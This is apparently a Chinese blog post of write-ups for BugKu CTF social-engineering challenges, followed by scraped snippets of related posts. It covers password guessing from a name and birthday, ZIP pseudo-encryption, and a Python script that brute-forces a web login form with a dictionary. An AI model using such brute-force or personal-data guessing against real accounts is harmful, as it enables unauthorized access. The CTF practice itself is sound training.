带你上分,顺便拿下CTF|BugKu 社会工程学

于 2024-05-16 10:07:09 发布
阅读量409 收藏 5
点赞数 4
文章标签: 安全 web安全 tcp/ip 网络 网络协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/baimao__Ch/article/details/138949104
版权

BugKu社会工程学题型

1、密码

题干: 姓名:张三 生日;19970315 KEY格式KEY{xxxxxxxxxx}

解析: 直接首字母zs,生日,就行

答案: flag{zs199970315}

2、信息查找

题干: 信息查找 听说bugku.cn 在今日头条上能找到?? 提示:flag为群号码 格式KEY{xxxxxxxxxxx}

解析: 直接百度搜索

3、简单个人信息收集

参考链接题干:1.zip

解析:首先尝试爆破,而后考虑ZIP伪加密,伪加密破解工具:

答案: flag{15206164164}

4、社工进阶

题干:解析:百度贴吧搜索 孤长离

答案: KEY{sg1H78Si9C0s99Q}

5、王小明的日记

参考链接

解析:注意题干提示的信息:bugku在线工具使用的工具为:在线密码攻击使用在线密码攻击,生成字典:

import requests,re
 
def req(pwd):
url='http://120.24.86.145:8002/xiaoming/?yes'
s = requests.session()
r = s.get(url)
r.encoding = 'utf-8'
# print(r.text)
response = s.post(url,data={'pwd':pwd})
response.encoding = 'utf-8'
# print(response.text)
b = re.findall(r'密码不正确,请重新输入', response.text)
# print(b)
return b
 
def zidian():
f = open('mima.txt','r',encoding='UTF-8')
a = f.read()
a = a.splitlines()
return a
 
 
a = zidian()
for pwd in a:
b = req(pwd)
try:
if b[0] == '密码不正确,请重新输入':
# print(b[0])
pass
except:
print(pwd)
break

参考链接

python3.5 crack.py

wxm

密码wxm

答案:flag{bugku-shegong_xmq}参考链接1

6、简单的社工尝试

解析:findneo.github.io/180406Bugku…参考链接:参考链接1参考链接2参考链接3github.com/bugkuweibo.com/bugkuc.bugku.com/13211.txt

网络安全工程师(白帽子)企业级学习路线

第一阶段:安全基础(入门)

img

第二阶段:Web渗透(初级网安工程师)

img

第三阶段:进阶部分(中级网络安全工程师)

img

学习资源分享

学习资源分享

baimao__沧海
关注
bugku ctf misc wp2.pdf
07-05
bugku ctf misc wp2.pdf
CTF练习——社工-进阶收集,小明打了一局CTF追到了小美
Jum的博客
11-26 2681
目 分析目 重点分析 再次分析 验证结果 拿目 附件就只有一张图,是QQ空间饿的说说。 分析目 使用百度识图技术初步判断该图的位置。得到如下重要结果:可以判断出这个是西安的大雁塔,来锁定位置是西安。 接着,从评论中对话,我们大概可以获得以下信息: 1、小美距离大雁塔一共有七站地铁,其中要进行中转。 2、时作者是从始发站出发的,距离下一站有一公里多,距离始发站800多米。 根据地铁的线索我们想着是赶紧去查询西安地铁线路图。西安地铁官网https://...
ctf Bugku-社工-初步搜集
Oranges.的博客
10-18 807
bugku -社工-初步搜集 新手一枚,参考了网上信息完成 这里是网站主页,查看源码什么都没有发现,进行敏感路径扫描 这里使用的是dirsearch进行扫描,这里扫描到了登录, 打开网页出现登录界面,尝试admin登录,发现失败了,这是,原网站只提供了一个下载连接,下载下来,是一个exe文件。 打开后为下面界面: 我们输入账号密码进行测试,没有信息,进行抓包测试,我利用的是wireshark,发现了user,pass和一个邮箱 对pass进行解码 得到后我们在登录界面输入账号密码进行测试,显示
Bugku-CTF社工篇之简单的个人信息收集
weixin_30593443的博客
08-14 671
简单的个人信息收集 解要点:压缩包伪加密、社工库查询 下载压缩包 发现有密码 先放到winhex里面看看 是个伪加密压缩包 将最后的09改为00(奇数表示加密,偶数表示未加密) 这里扩充一下压缩包伪加密的知识 压缩源文件数据区: 50 4B 03 04:这是头文件标记(0x04034b50) 14...
一道简单的CTF社工思路
qq_53829555的博客
09-27 1822
最近开始迷上了玩CTF,今天遇到一个很狗血的社工,与其说是社工,但是又搞得很杂,下面我来给大家讲讲这道目的思路.目来源:https://ctf.bugku.com/challenges/detail/id/187.html。
开源情报分析(OSINT)CTF社工类2万字详细教程,请不要利用本文章做不道德的事,后果概不负责
Ba1_Ma0的博客
05-14 9462
简介 现在国内外最新的ctf比赛都有这个项目了,列如给你一个照片找地址或者人名,给你一个名字找他的社交账号什么的,考验选手的信息收集与社工能力,这篇文章对这类型做一个基础的总结,以后遇到这种型就知道该怎么做了 本文章会教你们关于查找有关个人信息以及其他危险的技术,请不要做不道德的事,在任何时候都不应该将此技术用于未授权的事 开源情报分析简介(如果不是情报分析人员可以不用看) 在企业和社交媒体上都有公开信息,这些是对我们开源的,所以叫做开源情报分析 然后是情报搜集步骤 情报搜集步骤由五个部分组成 规划和
bugku ctf misc wp.pdf
07-05
根据所提供的文件内容,我们可以得知,这是一个针对“bugku ctf misc wp.pdf”文件的CTF(Capture The Flag)比赛中的misc(杂项)类别目的write-up(解答过程记录)。Misc类别通常包含各种非传统类型的目,要求...
BugKu 2021 CTF AWD 排位赛 真 S2 AWD排位赛-7.zip
12-07
在这样的比赛中,参赛者需要展示他们的网络安全技能,包括但不限于Web安全、逆向工程、密码学等,通过解决一系列难来获取虚拟旗帜,即"Flag"。 【描述】"BugKu 2021 CTF AWD 排位赛 真" 提示我们这个压缩包文件...
CTF中的密码学CryptoRSA学习资料,经典型代码wp
最新发布
03-22
主要是针对CTF中的密码学Crypto中RSA的知识,通过原理的代码,还有数论基础知识,让你在CTF的密码学方向,得到强化 适合人群:0基础CTF,喜欢密码学CTF,RSA 能学到什么:①Sagemath的使用②数论基础③针对RSA的...
CTF之常见密码学攻击手法和实现.md
10-24
CTF-crypto-入门-密码学
bugku ctf 简单的社工尝试 wirteup
成长之路
07-05 4208
简单的社工尝试 一、目内容:这个狗就是我画的,而且当了头像这提示的其实很明显了,想想吧。 二、这是一个社工,将图片上传到google识图(需要fuqiang)        google识图后 发现一个bugku的关键字,打开网页 发现一个微博连接,而且还有bugku关键字 打开连接 进入这个连接就可以拿到flag了
Bugku杂项目解析
北观止的博客
07-31 9294
Bugku杂项 1.签到 关注zerosun,发送flag得到flag值 falg{ugotzerosun} 2.这是一张单纯的图片 直接使用命令cat 1.jpg 最后一行的的信息,可知使用了base解密。key{you are right} 在 站长之家base解密 http://tool.chinaz.com/Tools/Base64.aspx 得到: key{you are right} 3.隐写 https://www.jianshu.com/p/262397d9610b urar e 2.ra
网络安全的魔法——社会工程学
QIANDXX的博客
02-13 516
如今的网络威胁不仅仅只有关于技术的漏洞了,更多的其实是依赖于人际互动。
BugKu CTF(杂项篇MISC)—社工-进阶收集
小司机的奥拓
08-01 659
5.最后试出来是兰乔国际城。这时候你当然需要一份系统性的学习路线如图片过大被平台压缩导致看不清的话,可以在文末下载(无偿的),大家也可以一起学习交流一下。一些我收集的网络安全自学入门书籍一些我白嫖到的不错的视频教程:上述资料【点下方卡片】就可以领取了,无偿分享。
BUUCTF-Crypto学习笔记(一)
weixin_42271850的博客
12-22 1165
最近在学习Crypto的相关知识,就每10写一个学习笔记记录一下。 一、MD5 目下载下来是一个文本,内容如下: #目原文 e00cf25ad42683b3df678c61f42c6bda 可以拿到在线解密MD5的网站:https://www.cmd5.com 进行在线解密,解出来的结果是admin1。 二、Url编码 目下载下来是一个文本,内容如下: #目原文 %66%6c%61%67%7b%61%6e%64%20%31%3d%31%7d 可以拿到在线的网站:http://tool.chin
bugkuctf——社工-伪造
小衎的博客
08-11 902
bugkuctf中的“社工伪造”目,需要修改图像,找不到这张图片,所以截图……感觉像素还可以,所以分享大家共用。
CTF-一次基于社会工程学的压缩包爆破
魔域的墨鱼
02-02 1215
每一篇文章中所用到的工具,我都会放在文章的最下面,欢迎支持~ 前几天做了一道CTF的MISC(杂项)类型的目只给了一个压缩包(链接在最下面)除此之外没有任何提示 既然是爆破,那就用一下暴力破解吧,经过几个小时的测试发现,无规律的随机密码应该是破解不了的,而且CTF也应该不会有这种纯暴力破解的目出现。 这时候就考虑一下字典爆破了。我尝试了网上很多的字典生成工具,都没有我想要的那种,...
CTF基础知识及web
m0_60484735的博客
04-21 7945
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录CTF基础知识一、CTF简介二、CTF赛事介绍三、CTF竞赛模式1.解模式(Jeopardy)2.攻防模式(Attack-Defense)3.混合模式(Mix)四、CTF竞赛内容国内外著名赛事1、国际知名CTF赛事2、国内知名CTF赛事五、如何学习CTF1、分析赛2、常规操作3、入门知识推荐书籍 CTF基础知识 一、CTF简介 CTF(Capture The Flag)夺旗比赛,在网络安全领域中指的是网络安全技术人员之间进行.
BugkuCTF 字符?正则?
08-11
BugkuCTF 是一个CTF(Capture The Flag)比赛平台,提供了一系列的网络安全挑战目供参赛者解决。在这个平台上,参赛者需要利用自己的技术和知识,寻找并利用目标系统中的漏洞,获取相应的flag来得分。 关于字符和正则表达式,在CTF比赛中常常会遇到需要处理字符或者利用正则表达式来解的情况。例如,有些目会提供一段加密后的字符串,参赛者需要根据加密算法进行解密,获取隐藏在其中的flag。而在其他目中,可能会给出一段文本,并要求参赛者使用正则表达式来匹配特定的模式或者提取特定的信息。 因此,在BugkuCTF中,对字符处理和正则表达式的理解和熟练应用是非常重要的技能之一。参赛者需要具备对字符编码、字符串操作、基本正则表达式语法等方面的知识,并能够灵活运用这些技巧来解决各种与字符和正则相关的目。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值